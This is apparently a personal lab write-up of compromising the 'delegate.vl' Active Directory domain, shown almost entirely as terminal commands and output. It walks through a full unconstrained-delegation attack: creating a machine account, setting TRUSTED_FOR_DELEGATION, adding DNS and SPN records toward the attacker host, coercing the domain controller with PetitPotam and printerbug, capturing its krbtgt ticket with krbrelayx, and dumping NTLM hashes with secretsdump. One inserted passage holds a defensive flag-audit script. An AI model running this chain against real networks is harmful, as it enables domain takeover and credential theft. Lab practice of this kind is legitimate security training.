SMB         dc1.delegate.vl 445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
LDAP        dc1.delegate.vl 389    DC1              [+] delegate.vl\N.Thompson:KALEB_2341 
MAQ         dc1.delegate.vl 389    DC1              [*] Getting the MachineAccountQuota
MAQ         dc1.delegate.vl 389    DC1              MachineAccountQuota: 10

.

New tools used here: dnstool.py and printerbug.py (both ship with krbrelayx).

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ git clone https://github.com/dirkjanm/krbrelayx.git

Cloning into 'krbrelayx'...
remote: Enumerating objects: 202, done.
remote: Counting objects: 100% (51/51), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 202 (delta 33), reused 30 (delta 27), pack-reused 151
Receiving objects: 100% (202/202), 102.06 KiB | 1.73 MiB/s, done.
Resolving deltas: 100% (109/109), done.
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv                                                                    
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate          
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  dnstool.py  krbrelayx.py  lib  LICENSE  printerbug.py  README.md  venv
                                                                                                                   
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m pip3 install impacket
/home/puck/vulnhub/delegate/krbrelayx/venv/bin/python3: No module named pip3
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ pip3 install impacket          
Collecting impacket
  Using cached impacket-0.11.0-py3-none-any.whl
--snip--
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pycryptodomex, pycparser, pyasn1, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, ldap3, Jinja2, cffi, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodomex-3.20.0 six-1.16.0
                                                                                                                     


.

New tools used here: bloodyAD.py, addspn.py and PetitPotam.py.

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  bloodyAD  dnstool.py  krbrelayx.py  lib  LICENSE  PetitPotam  printerbug.py  README.md  venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv                                            
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d 10.8.2.138 --action add DC1.delegate.vl -dns-ip 10.10.81.86      
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
                                                                                                                     
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD              
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION 
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ cd ..      
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl --additional 

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl             
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  bloodyAD  dnstool.py  krbrelayx.py  lib  LICENSE  PetitPotam  printerbug.py  README.md  venv
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd PetitPotam 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$ python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl 10.10.81.86

                                                                                               
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:10.10.81.86[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$ 

Below: bloodyAD installed in a Python virtual environment (I had trouble with dependencies).

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ git clone https://github.com/CravateRouge/bloodyAD.git
Cloning into 'bloodyAD'...
remote: Enumerating objects: 1123, done.
remote: Counting objects: 100% (495/495), done.
remote: Compressing objects: 100% (274/274), done.
remote: Total 1123 (delta 263), reused 350 (delta 209), pack-reused 628
Receiving objects: 100% (1123/1123), 584.62 KiB | 5.41 MiB/s, done.
Resolving deltas: 100% (681/681), done.
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION 
Traceback (most recent call last):
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD.py", line 2, in <module>
    from bloodyAD import main
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/__init__.py", line 1, in <module>
    from .network.config import Config, ConnectionHandler
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/config.py", line 2, in <module>
    from bloodyAD.network.ldap import Ldap
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/ldap.py", line 5, in <module>
    from msldap.client import MSLDAPClient
ModuleNotFoundError: No module named 'msldap'
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ pip3 install -r requirements.txt
Processing /home/puck/vulnhub/delegate/krbrelayx/bloodyAD
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Collecting asn1crypto>=1.3.0 (from bloodyAD==2.0.3->-r requirements.txt (line 1))
--snip--
Successfully built bloodyAD
Installing collected packages: wcwidth, asn1crypto, unicrypto, tqdm, tabulate, prompt-toolkit, oscrypto, h11, winacl, asysocks, minikerberos, asyauth, msldap, bloodyAD
Successfully installed asn1crypto-1.5.1 asyauth-0.0.20 asysocks-0.2.12 bloodyAD-2.0.3 h11-0.14.0 minikerberos-0.4.4 msldap-0.5.10 oscrypto-1.3.0 prompt-toolkit-3.0.47 tabulate-0.9.0 tqdm-4.66.4 unicrypto-0.0.10 wcwidth-0.2.13 winacl-0.1.9
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ 

.

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC 
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache

Using Powermad & printerbug

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ evil-winrm -i DC1.delegate.vl -u N.Thompson -p KALEB_2341
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> upload Powermad.ps1
                                        
Info: Uploading /home/puck/vulnhub/delegate/Powermad.ps1 to C:\Users\N.Thompson\Documents\Powermad.ps1
                                        
Data: 180768 bytes of 180768 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
[+] Machine account PWNED added
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384
[+] Machine account pwned attribute useraccountcontrol updated
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Value HTTP/PWNED.delegate.vl -Append
[+] Machine account pwned attribute ServicePrincipalName appended
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=pwned,CN=Computers,DC=delegate,DC=vl
HTTP/PWNED.delegate.vl
RestrictedKrbHost/PWNED
HOST/PWNED
RestrictedKrbHost/PWNED.delegate.vl
HOST/PWNED.delegate.vl
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> 
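The Powermad step above sets userAccountControl to 528384 on the new machine account, and the earlier bloodyAD step adds the TRUSTED_FOR_DELEGATION flag to UwU$. The following is an added example, not code from the writeup or from any of the tools it uses: it decodes a userAccountControl integer into its named flags and audits a constructed list of computer records for non-DC accounts that are trusted for unconstrained delegation, which is what a defender would look for after this kind of change. The record layout and sample values are assumptions made for the example.

```python
# Added example, not part of the original writeup.
# Decodes userAccountControl bit flags (e.g. the 528384 set on PWNED$ above) and
# flags computer accounts that are trusted for unconstrained delegation but are
# not domain controllers. Flag values follow Microsoft's documented UAC bits.

from dataclasses import dataclass
from typing import Dict, List

UAC_FLAGS: Dict[str, int] = {
    "SCRIPT": 0x0001,
    "ACCOUNTDISABLE": 0x0002,
    "NORMAL_ACCOUNT": 0x0200,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,
    "NOT_DELEGATED": 0x100000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,
}


def decode_uac(value: int) -> List[str]:
    """Return the names of every flag set in a userAccountControl integer."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


@dataclass
class ComputerRecord:
    """Minimal stand-in for the LDAP attributes an audit would pull (assumed layout)."""
    sam_account_name: str
    user_account_control: int
    service_principal_names: List[str]


def is_domain_controller(rec: ComputerRecord) -> bool:
    # DCs carry SERVER_TRUST_ACCOUNT; ordinary machine accounts carry WORKSTATION_TRUST_ACCOUNT.
    return bool(rec.user_account_control & UAC_FLAGS["SERVER_TRUST_ACCOUNT"])


def find_rogue_unconstrained(records: List[ComputerRecord]) -> List[str]:
    """Names of non-DC computer accounts with TRUSTED_FOR_DELEGATION set.

    A host with this flag receives forwardable TGTs of every principal that
    authenticates to it, so outside DCs it should be a documented exception.
    """
    return [
        rec.sam_account_name
        for rec in records
        if "TRUSTED_FOR_DELEGATION" in decode_uac(rec.user_account_control)
        and not is_domain_controller(rec)
    ]


# Constructed sample data (not lab output): a DC, a plain workstation, and an
# account configured the way the writeup configures PWNED$.
SAMPLE_RECORDS = [
    ComputerRecord("DC1$", 0x82000, ["HOST/DC1.delegate.vl", "ldap/DC1.delegate.vl"]),
    ComputerRecord("WS01$", 0x1000, ["HOST/WS01.delegate.vl"]),
    ComputerRecord("PWNED$", 528384, ["HTTP/PWNED.delegate.vl", "HOST/PWNED.delegate.vl"]),
]

if __name__ == "__main__":
    print("528384 decodes to:", decode_uac(528384))
    print("non-DC accounts trusted for delegation:", find_rogue_unconstrained(SAMPLE_RECORDS))
```

Running it shows that 528384 is WORKSTATION_TRUST_ACCOUNT plus TRUSTED_FOR_DELEGATION, and that PWNED$ is the only sample account flagged; in a real environment the records would come from an LDAP query over computer objects and the output would feed a ticket or alert.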

Set up the listener (then wait for a connection).

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :7A21990FCD3D759941E45C490F143D5F
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.105.77
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

Start printerbug.

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\pwned$' -p 12345 -r PWNED.delegate.vl -d 10.8.2.138 --action add -dns-ip 10.10.105.77 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
 addspn.py  'DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache'   krbrelayx.py   LICENSE      printerbug.py   venv
 bloodyAD    dnstool.py                                    lib            PetitPotam   README.md
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 printerbug.py delegate.vl/'PWNED$'@dc1.delegate.vl PWNED.delegate.vl
[*] Impacket v0.11.0 - Copyright 2023 Fortra

Password:12345
[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]

Use impacket-secretsdump to get the hashes.

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ export KRB5CCNAME=$(pwd)/DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ klist                                                               
Ticket cache: FILE:/home/puck/vulnhub/delegate/krbrelayx/DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Default principal: DC1$@DELEGATE.VL

Valid starting       Expires              Service principal
06/12/2024 07:13:23  06/12/2024 17:07:36  krbtgt/DELEGATE.VL@DELEGATE.VL
    renew until 06/19/2024 07:07:36
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ impacket-secretsdump -k DC1.delegate.vl -just-dc-ntlm               
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32<REDACTED>e93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:6d93f6dbd8902d77f43e04bb1b1b5c6e:::
PWNED$:3101:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
[*] Cleaning up... 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]

.

What a ride.